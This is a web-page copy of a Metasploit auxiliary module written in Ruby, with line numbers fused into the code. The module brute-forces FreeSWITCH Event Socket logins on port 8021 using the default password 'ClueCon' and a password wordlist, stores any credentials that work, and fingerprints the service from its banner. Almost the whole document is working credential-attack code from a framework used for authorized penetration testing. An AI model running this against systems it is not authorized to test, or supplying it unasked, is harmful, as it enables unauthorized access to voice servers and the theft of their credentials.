CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/credential_collection'6require 'metasploit/framework/login_scanner/freeswitch_event_socket'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::Tcp10include Msf::Auxiliary::Scanner11include Msf::Auxiliary::Report12include Msf::Auxiliary::AuthBrute13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'FreeSWITCH Event Socket Login',20'Description' => %q{21This module tests FreeSWITCH Event Socket logins on a range of22machines and report successful attempts.23},24'Author' => [25'krastanoel'26],27'References' => [28['URL', 'https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket']29],30'DefaultOptions' => { 'VERBOSE' => false },31'License' => MSF_LICENSE,32'Notes' => {33'Stability' => [CRASH_SERVICE_RESTARTS],34'Reliability' => [],35'SideEffects' => []36}37)38)3940register_options(41[42Opt::RPORT(8021),43OptString.new('PASSWORD', [false, 'FreeSWITCH event socket default password', 'ClueCon']),44OptPath.new('PASS_FILE',45[46false,47'The file that contains a list of of probable passwords.',48File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')49])50]51)5253# freeswitch does not have an username, there's only password54deregister_options(55'DB_ALL_CREDS', 'DB_ALL_USERS', 'DB_SKIP_EXISTING', 'BLANK_PASSWORDS',56'USERNAME', 'USER_AS_PASS', 'USERPASS_FILE', 'USER_FILE',57'STOP_ON_SUCCESS'58)59end6061def run_host(ip)62cred_collection = Metasploit::Framework::PrivateCredentialCollection.new(63password: datastore['PASSWORD'],64pass_file: datastore['PASS_FILE']65)66cred_collection = prepend_db_passwords(cred_collection)6768scanner = Metasploit::Framework::LoginScanner::FreeswitchEventSocket.new(69configure_login_scanner(70host: ip,71port: rport,72cred_details: cred_collection,73stop_on_success: true, # this will have no effect due to the scanner behaviour when scanning without username74connection_timeout: 1075)76)7778scanner.scan! do |result|79credential_data = result.to_h80credential_data.merge!(81module_fullname: fullname,82workspace_id: myworkspace_id83)8485if result.success?86credential_data.delete(:username) # This service uses no username87credential_core = create_credential(credential_data)88credential_data[:core] = credential_core89create_credential_login(credential_data)9091if datastore['VERBOSE']92vprint_good("Login Successful: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")93else94print_good("Login Successful: #{result.credential.private}")95end96else97invalidate_login(credential_data)98vprint_error("LOGIN FAILED: #{result.credential.private} (#{result.status}: #{result.proof&.strip})")99end100end101end102103def check_host(_ip)104connect105banner = sock.get106disconnect(sock)107108if banner.include?('Access Denied, go away.') || banner.include?('text/rude-rejection')109return Exploit::CheckCode::Safe('Access denied by network ACL')110end111112unless banner.include?('Content-Type: auth/request')113return Exploit::CheckCode::Unknown('Unable to determine the service fingerprint')114end115116return Exploit::CheckCode::Appears117end118end119120121